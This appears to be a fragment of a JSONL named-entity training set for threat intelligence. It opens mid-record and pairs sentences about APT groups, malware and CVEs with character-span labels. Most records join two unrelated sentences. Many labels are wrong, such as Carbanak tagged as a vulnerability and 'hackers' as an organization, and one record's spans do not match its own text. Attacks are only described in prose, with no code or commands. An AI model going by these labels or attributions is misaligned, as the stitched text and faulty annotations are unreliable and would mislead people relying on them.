"System"}, {"start": 305, "end": 308, "label": "System"}]} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . 
Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 76, "end": 84, "label": "Organization"}, {"start": 176, "end": 183, "label": "System"}, {"start": 186, "end": 199, "label": "Organization"}, {"start": 282, "end": 287, "label": "System"}, {"start": 288, "end": 295, "label": "Vulnerability"}, {"start": 298, "end": 311, "label": "Vulnerability"}]} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 202, "end": 215, "label": "Vulnerability"}, {"start": 218, "end": 231, "label": "Vulnerability"}, {"start": 235, "end": 248, "label": "Vulnerability"}]} {"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . 
Moreover , they used the same exploit kit Niteris as that in the Corkow case .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 78, "end": 93, "label": "Organization"}, {"start": 96, "end": 115, "label": "Organization"}, {"start": 118, "end": 137, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 225, "end": 247, "label": "Vulnerability"}, {"start": 266, "end": 270, "label": "System"}, {"start": 311, "end": 318, "label": "Vulnerability"}, {"start": 319, "end": 330, "label": "Vulnerability"}, {"start": 346, "end": 352, "label": "Malware"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 203, "end": 216, "label": "Vulnerability"}]} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . 
The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 76, "end": 84, "label": "Organization"}, {"start": 176, "end": 183, "label": "System"}, {"start": 190, "end": 205, "label": "Malware"}, {"start": 218, "end": 224, "label": "System"}, {"start": 225, "end": 233, "label": "Vulnerability"}, {"start": 276, "end": 287, "label": "Organization"}, {"start": 291, "end": 301, "label": "Organization"}]} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . While documents designed to exploit the InPage software are rare , they are not new \u2013 however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 166, "end": 173, "label": "Vulnerability"}, {"start": 178, "end": 193, "label": "Malware"}, {"start": 248, "end": 254, "label": "Organization"}, {"start": 277, "end": 283, "label": "System"}, {"start": 284, "end": 292, "label": "Vulnerability"}, {"start": 356, "end": 363, "label": "Vulnerability"}, {"start": 388, "end": 397, "label": "Organization"}]} {"text": "Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . 
Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": [{"start": 41, "end": 46, "label": "Organization"}, {"start": 214, "end": 223, "label": "Organization"}, {"start": 253, "end": 260, "label": "Vulnerability"}, {"start": 393, "end": 406, "label": "Vulnerability"}, {"start": 411, "end": 425, "label": "Vulnerability"}]} {"text": "In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": [{"start": 21, "end": 26, "label": "Organization"}, {"start": 37, "end": 47, "label": "System"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 223, "end": 232, "label": "Indicator"}, {"start": 244, "end": 257, "label": "Vulnerability"}]} {"text": "APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 19, "end": 35, "label": "Organization"}, {"start": 124, "end": 144, "label": "Malware"}, {"start": 229, "end": 242, "label": "Vulnerability"}, {"start": 247, "end": 261, "label": "Vulnerability"}]} {"text": "In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . 
The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 .", "spans": [{"start": 20, "end": 25, "label": "Organization"}, {"start": 36, "end": 46, "label": "System"}, {"start": 87, "end": 95, "label": "System"}, {"start": 139, "end": 154, "label": "Malware"}, {"start": 208, "end": 221, "label": "Vulnerability"}]} {"text": "In another instance , APT41 targeted a hotel\u2019s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . The documents that exploit CVE-2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 212, "end": 219, "label": "Vulnerability"}, {"start": 220, "end": 234, "label": "Vulnerability"}, {"start": 265, "end": 281, "label": "System"}, {"start": 284, "end": 287, "label": "System"}, {"start": 314, "end": 326, "label": "System"}, {"start": 329, "end": 332, "label": "System"}, {"start": 417, "end": 426, "label": "Indicator"}]} {"text": "The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users .", "spans": [{"start": 34, "end": 39, "label": "Organization"}, {"start": 156, "end": 174, "label": "Vulnerability"}, {"start": 196, "end": 208, "label": "Vulnerability"}]} {"text": "At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group\u2019s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user\u2019s credentials . 
Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance .", "spans": [{"start": 84, "end": 94, "label": "Organization"}, {"start": 285, "end": 292, "label": "System"}, {"start": 293, "end": 300, "label": "Vulnerability"}, {"start": 343, "end": 348, "label": "Organization"}, {"start": 381, "end": 383, "label": "Indicator"}]} {"text": "The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 92, "end": 100, "label": "Organization"}, {"start": 101, "end": 114, "label": "Organization"}, {"start": 198, "end": 211, "label": "Vulnerability"}]} {"text": "They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 46, "end": 54, "label": "Organization"}, {"start": 208, "end": 220, "label": "Organization"}, {"start": 260, "end": 275, "label": "Organization"}, {"start": 311, "end": 318, "label": "Organization"}, {"start": 348, "end": 356, "label": "Vulnerability"}, {"start": 357, "end": 370, "label": "Vulnerability"}, {"start": 373, "end": 386, "label": "Vulnerability"}]} {"text": "SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker\u2019s server when the malicious documents were run . 
The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 130, "end": 140, "label": "Organization"}, {"start": 207, "end": 229, "label": "Malware"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 310, "end": 318, "label": "Vulnerability"}, {"start": 319, "end": 326, "label": "Vulnerability"}, {"start": 329, "end": 342, "label": "Vulnerability"}]} {"text": "Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence\u2019s Trojan , known as Silence.MainModule . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 111, "end": 120, "label": "Organization"}, {"start": 273, "end": 280, "label": "System"}, {"start": 285, "end": 293, "label": "Vulnerability"}, {"start": 294, "end": 301, "label": "Vulnerability"}, {"start": 304, "end": 317, "label": "Vulnerability"}]} {"text": "The hackers will map a company\u2019s network and look for strategically favorable locations for placing their malware . 
To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 .", "spans": [{"start": 4, "end": 11, "label": "Organization"}, {"start": 185, "end": 201, "label": "Malware"}, {"start": 218, "end": 231, "label": "Malware"}, {"start": 268, "end": 276, "label": "Vulnerability"}, {"start": 277, "end": 284, "label": "Vulnerability"}, {"start": 287, "end": 300, "label": "Vulnerability"}]} {"text": "Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . This sample was also found to be deployed using the CVE-2012-0158 vulnerability .", "spans": [{"start": 12, "end": 17, "label": "Organization"}, {"start": 195, "end": 208, "label": "Vulnerability"}]} {"text": "If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 50, "end": 57, "label": "Organization"}, {"start": 241, "end": 248, "label": "Vulnerability"}, {"start": 249, "end": 262, "label": "Vulnerability"}, {"start": 274, "end": 292, "label": "Malware"}]} {"text": "Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . 
Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 91, "end": 104, "label": "Organization"}, {"start": 265, "end": 272, "label": "Organization"}, {"start": 296, "end": 307, "label": "Malware"}, {"start": 321, "end": 328, "label": "Vulnerability"}, {"start": 329, "end": 342, "label": "Vulnerability"}, {"start": 354, "end": 372, "label": "Malware"}]} {"text": "The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 36, "end": 40, "label": "Organization"}, {"start": 74, "end": 91, "label": "Organization"}, {"start": 109, "end": 118, "label": "Organization"}, {"start": 172, "end": 183, "label": "Malware"}, {"start": 197, "end": 204, "label": "Vulnerability"}, {"start": 205, "end": 218, "label": "Vulnerability"}, {"start": 230, "end": 248, "label": "Malware"}]} {"text": "Alpha\u2019s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 235, "end": 242, "label": "Vulnerability"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 272, "end": 290, "label": "Malware"}]} {"text": "Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . 
In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 95, "end": 111, "label": "Organization"}, {"start": 251, "end": 262, "label": "Malware"}, {"start": 276, "end": 283, "label": "Vulnerability"}, {"start": 284, "end": 297, "label": "Vulnerability"}, {"start": 313, "end": 331, "label": "Malware"}]} {"text": "In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface (AMSI) . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 44, "end": 49, "label": "Organization"}, {"start": 192, "end": 203, "label": "Malware"}, {"start": 217, "end": 224, "label": "Vulnerability"}, {"start": 225, "end": 238, "label": "Vulnerability"}, {"start": 254, "end": 272, "label": "Malware"}]} {"text": "Distinct changes to Azazel by the Winnti developers include the addition of a function named \u2018Decrypt2\u2019 , which is used to decode an embedded configuration similar to the core implant . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": [{"start": 20, "end": 26, "label": "System"}, {"start": 34, "end": 51, "label": "Organization"}, {"start": 186, "end": 199, "label": "Organization"}, {"start": 223, "end": 239, "label": "Organization"}, {"start": 240, "end": 248, "label": "Vulnerability"}, {"start": 296, "end": 323, "label": "Indicator"}, {"start": 326, "end": 353, "label": "Indicator"}]} {"text": "Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . 
The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 50, "end": 57, "label": "Organization"}, {"start": 77, "end": 90, "label": "Organization"}, {"start": 182, "end": 187, "label": "Indicator"}, {"start": 188, "end": 195, "label": "Vulnerability"}, {"start": 211, "end": 227, "label": "System"}, {"start": 244, "end": 257, "label": "Vulnerability"}]} {"text": "APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . Earlier this month , Securelist 's technology caught another zero-day exploits deployed in targeted attacks .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 57, "end": 78, "label": "Malware"}, {"start": 136, "end": 146, "label": "Organization"}, {"start": 176, "end": 184, "label": "Vulnerability"}]} {"text": "Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit .", "spans": [{"start": 80, "end": 88, "label": "Malware"}, {"start": 250, "end": 255, "label": "Vulnerability"}, {"start": 258, "end": 276, "label": "System"}, {"start": 277, "end": 284, "label": "Vulnerability"}]} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . 
Adobe Flash Player exploit .", "spans": [{"start": 22, "end": 26, "label": "Malware"}, {"start": 27, "end": 65, "label": "Malware"}, {"start": 163, "end": 181, "label": "System"}, {"start": 182, "end": 189, "label": "Vulnerability"}]} {"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April .", "spans": [{"start": 89, "end": 97, "label": "Malware"}, {"start": 102, "end": 109, "label": "Malware"}, {"start": 137, "end": 147, "label": "Malware"}, {"start": 152, "end": 159, "label": "Malware"}, {"start": 224, "end": 233, "label": "Organization"}, {"start": 251, "end": 259, "label": "Vulnerability"}, {"start": 260, "end": 267, "label": "Vulnerability"}, {"start": 270, "end": 283, "label": "Vulnerability"}]} {"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": [{"start": 48, "end": 52, "label": "Malware"}, {"start": 57, "end": 64, "label": "Malware"}, {"start": 133, "end": 145, "label": "System"}, {"start": 146, "end": 153, "label": "Vulnerability"}, {"start": 156, "end": 169, "label": "Vulnerability"}]} {"text": "Ploutus-D will load KXCashDispenserLib\u201d library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . 
ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 82, "end": 100, "label": "Malware"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 226, "end": 238, "label": "System"}, {"start": 239, "end": 246, "label": "Vulnerability"}, {"start": 249, "end": 262, "label": "Vulnerability"}]} {"text": "DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 81, "end": 89, "label": "System"}, {"start": 98, "end": 111, "label": "Malware"}, {"start": 223, "end": 232, "label": "Organization"}, {"start": 266, "end": 274, "label": "Vulnerability"}]} {"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 74, "end": 99, "label": "Malware"}, {"start": 192, "end": 199, "label": "Vulnerability"}, {"start": 205, "end": 218, "label": "Vulnerability"}, {"start": 222, "end": 227, "label": "Malware"}]} {"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . 
Earlier this month , we caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 15, "end": 46, "label": "System"}, {"start": 232, "end": 240, "label": "Vulnerability"}, {"start": 241, "end": 259, "label": "System"}]} {"text": "PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 36, "end": 60, "label": "Vulnerability"}, {"start": 169, "end": 176, "label": "Vulnerability"}, {"start": 183, "end": 196, "label": "Vulnerability"}]} {"text": "They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": [{"start": 31, "end": 55, "label": "Vulnerability"}, {"start": 155, "end": 162, "label": "Vulnerability"}, {"start": 169, "end": 182, "label": "Vulnerability"}]} {"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() . 
The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily .", "spans": [{"start": 110, "end": 124, "label": "Vulnerability"}, {"start": 138, "end": 148, "label": "System"}, {"start": 299, "end": 304, "label": "System"}, {"start": 305, "end": 313, "label": "Vulnerability"}]} {"text": "APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 46, "end": 65, "label": "Vulnerability"}, {"start": 74, "end": 90, "label": "System"}, {"start": 91, "end": 100, "label": "System"}, {"start": 196, "end": 204, "label": "Vulnerability"}, {"start": 222, "end": 227, "label": "System"}]} {"text": "Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . 
Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 51, "end": 58, "label": "System"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 173, "end": 186, "label": "Organization"}, {"start": 252, "end": 260, "label": "Vulnerability"}, {"start": 314, "end": 327, "label": "Organization"}]} {"text": "If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April .", "spans": [{"start": 32, "end": 40, "label": "Vulnerability"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 258, "end": 267, "label": "Organization"}, {"start": 284, "end": 293, "label": "Organization"}, {"start": 323, "end": 331, "label": "Vulnerability"}, {"start": 334, "end": 347, "label": "Vulnerability"}, {"start": 369, "end": 378, "label": "Organization"}, {"start": 379, "end": 382, "label": "System"}]} {"text": "To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . 
Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": [{"start": 57, "end": 80, "label": "System"}, {"start": 83, "end": 86, "label": "System"}, {"start": 91, "end": 99, "label": "Vulnerability"}, {"start": 215, "end": 220, "label": "System"}, {"start": 221, "end": 228, "label": "Vulnerability"}, {"start": 231, "end": 244, "label": "Vulnerability"}]} {"text": "Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 .", "spans": [{"start": 75, "end": 83, "label": "Vulnerability"}, {"start": 88, "end": 107, "label": "Organization"}, {"start": 209, "end": 231, "label": "Organization"}, {"start": 271, "end": 276, "label": "System"}, {"start": 341, "end": 349, "label": "Vulnerability"}, {"start": 350, "end": 363, "label": "Vulnerability"}]} {"text": "Dubbed \u2018Operation Sheep\u2019 , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . 
Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit .", "spans": [{"start": 7, "end": 24, "label": "Organization"}, {"start": 123, "end": 138, "label": "Vulnerability"}, {"start": 206, "end": 218, "label": "Organization"}, {"start": 245, "end": 276, "label": "Malware"}, {"start": 300, "end": 311, "label": "Organization"}, {"start": 338, "end": 350, "label": "System"}, {"start": 351, "end": 358, "label": "Vulnerability"}]} {"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes .", "spans": [{"start": 80, "end": 105, "label": "Malware"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 166, "end": 178, "label": "System"}, {"start": 210, "end": 236, "label": "System"}, {"start": 239, "end": 242, "label": "System"}, {"start": 247, "end": 259, "label": "Organization"}, {"start": 290, "end": 294, "label": "System"}, {"start": 295, "end": 303, "label": "Vulnerability"}, {"start": 304, "end": 311, "label": "Vulnerability"}]} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b .", "spans": [{"start": 84, "end": 109, "label": "Malware"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 182, "label": "System"}, {"start": 214, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}, {"start": 262, "end": 267, "label": "System"}, {"start": 268, "end": 276, "label": "Vulnerability"}, {"start": 346, "end": 350, "label": "System"}, {"start": 351, "end": 359, "label": "Vulnerability"}, {"start": 419, "end": 432, "label": "Organization"}, {"start": 445, "end": 473, "label": "Vulnerability"}]} {"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims .", "spans": [{"start": 86, "end": 99, "label": "Malware"}, {"start": 119, "end": 158, "label": "Vulnerability"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 204, "end": 211, "label": "Organization"}, {"start": 247, "end": 254, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Vulnerability"}]} {"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . 
Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 166, "end": 196, "label": "Vulnerability"}, {"start": 315, "end": 328, "label": "Vulnerability"}, {"start": 418, "end": 428, "label": "Organization"}]} {"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet .", "spans": [{"start": 7, "end": 15, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 211, "end": 222, "label": "Vulnerability"}, {"start": 223, "end": 230, "label": "Vulnerability"}, {"start": 270, "end": 277, "label": "System"}, {"start": 278, "end": 291, "label": "Vulnerability"}, {"start": 296, "end": 309, "label": "Vulnerability"}]} {"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . One vulnerability is a Windows zero-day vulnerability ( CVE-2019-0703 ) discovered by Symantec . 
Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": [{"start": 9, "end": 18, "label": "Organization"}, {"start": 45, "end": 54, "label": "Malware"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 105, "end": 112, "label": "System"}, {"start": 113, "end": 121, "label": "Vulnerability"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 168, "end": 176, "label": "Organization"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 201, "end": 208, "label": "System"}, {"start": 209, "end": 224, "label": "Vulnerability"}]} {"text": "The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools\u2014EternalRomance and EternalSynergy\u2014that were also released as part of the Shadow Brokers leak .", "spans": [{"start": 27, "end": 40, "label": "Vulnerability"}, {"start": 71, "end": 87, "label": "System"}, {"start": 90, "end": 93, "label": "Malware"}, {"start": 223, "end": 232, "label": "Malware"}, {"start": 246, "end": 253, "label": "System"}, {"start": 361, "end": 368, "label": "Vulnerability"}, {"start": 448, "end": 462, "label": "Organization"}]} {"text": "Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . 
Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 37, "end": 62, "label": "Vulnerability"}, {"start": 110, "end": 137, "label": "Malware"}, {"start": 140, "end": 167, "label": "Malware"}, {"start": 184, "end": 197, "label": "Vulnerability"}, {"start": 240, "end": 253, "label": "Vulnerability"}, {"start": 318, "end": 332, "label": "Organization"}, {"start": 394, "end": 402, "label": "Organization"}]} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . The zero-day vulnerability found and reported by Symantec CVE-2019-0703 occurs due to the ACT the Windows SMB Server handles certain requests .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 163, "end": 171, "label": "Vulnerability"}, {"start": 208, "end": 216, "label": "Organization"}, {"start": 217, "end": 230, "label": "Vulnerability"}, {"start": 257, "end": 264, "label": "System"}]} {"text": "CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . 
